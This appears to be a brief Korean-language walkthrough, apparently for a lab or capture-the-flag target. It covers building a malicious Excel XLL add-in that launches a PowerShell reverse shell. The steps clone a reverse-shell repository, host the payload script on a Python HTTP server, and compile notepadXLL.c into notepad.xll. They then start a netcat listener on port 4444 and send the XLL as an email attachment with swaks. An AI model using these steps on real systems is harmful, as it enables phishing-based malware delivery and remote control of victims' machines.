
xll windows 리버스 셸
xll 윈도우 리버스 셸
git clone https://github.com/n3rdh4x0r/xll_windows_reverse_shell.git
revsh.ps1을 업데이트하세요.python3 -m http.server 9999
notpadXLL.c를 Windows 공격자 머신으로 이동하고 그에 맞게 notpadXLL.c를 업데이트하세요.x64 Native Tools Command Prompt for VS 2022를 엽니다.notepad.xll을 생성합니다.cl.exe /LD notepadXLL.c /link /out:notepad.xll

notepad.xll을 Kali 머신으로 이동하세요.swaks를 다운로드합니다. curl -O https://jetmore.org/john/code/swaks/files/swaks-20240103.0/swaks
nc -nlvp 4444
swaks를 사용하여 notepad.xll이 첨부된 이메일을 전송합니다:./swaks --to [email protected] --from [email protected] --server 10.10.11.21 --port 25 --header "Subject: test" --body "test" --attach @notepad.xll
